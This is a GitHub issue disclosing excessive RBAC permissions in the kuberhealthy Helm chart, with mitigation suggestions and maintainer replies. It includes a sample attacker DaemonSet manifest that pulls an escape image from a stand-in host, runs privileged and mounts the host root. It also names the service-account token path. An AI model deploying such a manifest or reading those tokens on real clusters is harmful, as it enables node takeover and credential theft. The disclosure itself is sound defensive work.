
[BUG] Deployment kuberhealthy has excessive RBAC permissions, which may lead to the whole cluster being hijacked #1255

Open
Yseona opened this issue Apr 30, 2024 · 3 comments
Labels
bug Something isn't working

Comments

Yseona commented Apr 30, 2024

Hi community! Our team just found a possible security issue when reading the code. We would like to discuss whether it is a real vulnerability.

Description

The bug is that the Deployment kuberhealthy in the charts has more RBAC permissions than it needs, which may cause security problems; in the worst case, the whole cluster could be hijacked. Specifically, kuberhealthy is bound to a ClusterRole (clusterrole.yaml#L5) with the following sensitive permissions:

  • create/patch/update verbs on the daemonsets resource (ClusterRole)
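For reference, a ClusterRole rule granting these verbs would look roughly like the following sketch (illustrative only; see the chart's actual clusterrole.yaml for the exact rules):

```yaml
# Illustrative sketch of the sensitive rule, not the exact chart contents.
- apiGroups:
    - apps
  resources:
    - daemonsets
  verbs:
    - create
    - patch
    - update
```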

After reading the source code of kuberhealthy, I did not find any Kubernetes API usage that requires these permissions. However, these unused permissions carry potential risk:

  • create/patch/update verbs on the daemonsets resource (ClusterRole)
    • A malicious user can create a privileged container from a malicious image capable of container escape, gaining root privileges on the worker node where the container runs. Since the malicious user controls the pod scheduling parameters (e.g., replica count, node affinity, …), they can deploy the malicious container to every (or almost every) worker node. This means the malicious user would be able to control every (or almost every) worker node in the cluster.
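As a concrete sketch of the attack (all names and the image are hypothetical), an attacker holding the daemonsets create verb could submit a manifest along these lines. A DaemonSet schedules one pod on every eligible node, which is exactly why this verb reaches the whole cluster:

```yaml
# Hypothetical attacker manifest; the name, labels, and image are made up.
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: innocuous-agent          # disguised as a monitoring agent
  namespace: kube-system
spec:
  selector:
    matchLabels:
      app: innocuous-agent
  template:
    metadata:
      labels:
        app: innocuous-agent
    spec:
      containers:
        - name: agent
          image: attacker.example.com/escape:latest  # malicious image
          securityContext:
            privileged: true     # enables container-escape techniques
          volumeMounts:
            - name: host-root
              mountPath: /host
      volumes:
        - name: host-root
          hostPath:
            path: /              # mounts the node's root filesystem
```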

A malicious user only needs to obtain the service account token to perform the above attack. Several ways to achieve this have already been reported in the real world:

  • Supply chain attacks: like the recent xz backdoor. The attacker only needs to read /var/run/secrets/kubernetes.io/serviceaccount/token.
  • RCE vulnerability in the app: any remote-code-execution vulnerability that can read local files can achieve this.

Mitigation Suggestion

  • Create a separate service account and remove all the unnecessary permissions
  • Write Kyverno or OPA/Gatekeeper policy to:
    • Limit the container image, entrypoint, and commands of newly created pods. This would effectively prevent the creation of malicious containers.
    • Restrict the securityContext of newly created pods, especially enforcing securityContext.privileged and securityContext.allowPrivilegeEscalation to false. This would prevent the attacker from escaping the malicious container. In older Kubernetes versions, PodSecurityPolicy can also be used to achieve this (it was deprecated in v1.21).
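For instance, the second suggestion could be enforced with a Kyverno ClusterPolicy roughly like the sketch below (the policy name and match scope are assumptions; the `=(...)` anchors make the fields optional but constrained when present):

```yaml
# Sketch of a Kyverno validate policy; adjust the match scope as needed.
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: disallow-privileged-containers
spec:
  validationFailureAction: Enforce
  rules:
    - name: deny-privileged
      match:
        any:
          - resources:
              kinds:
                - Pod
      validate:
        message: "Privileged containers and privilege escalation are not allowed."
        pattern:
          spec:
            containers:
              - =(securityContext):
                  =(privileged): "false"
                  =(allowPrivilegeEscalation): "false"
```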

A Few Questions

  • Are these permissions really unused by kuberhealthy?
  • Would these mitigation suggestions be applicable to kuberhealthy?
  • Our team has also found other unnecessary permissions (not as sensitive as the above, but they could also cause security issues). Please let us know if you are interested; we would be happy to share them or submit a PR with a fix.

References

Several CVEs have already been assigned in other projects for similar issues:

Yseona added the bug label Apr 30, 2024
Yseona (Author) commented May 6, 2024

Hi community:
I noticed that this issue hasn't been answered yet; please feel free to let me know if you need more information. Our team is happy to cooperate and do what we can to resolve this issue.

peschmae (Contributor) commented:
Kuberhealthy does have code that needs the daemonset create verb: https://github.com/kuberhealthy/kuberhealthy/blob/master/cmd/daemonset-check/kube_api.go#L47

How did you check the code? Was that done automatically?

kaaass commented May 15, 2024

Kuberhealthy does have code that needs the daemonset create verb: https://github.com/kuberhealthy/kuberhealthy/blob/master/cmd/daemonset-check/kube_api.go#L47

@peschmae Thank you for reminding us of this! We did find during our check that the daemonset create verb is used there. However, after a closer inspection, we found that this function is only called by cmd/daemonset-check/main.go, not by cmd/deployment-check/main.go or cmd/kuberhealthy/main.go. Therefore, we only reported the issue for the Deployment kuberhealthy.

How did you check the code? Was that done automatically?

We wrote a tool that matches the APIs for all resource operations in the controller-runtime and client-go SDKs, and then checks whether each one is actually used by a workload. We manually verified each permission we reported.
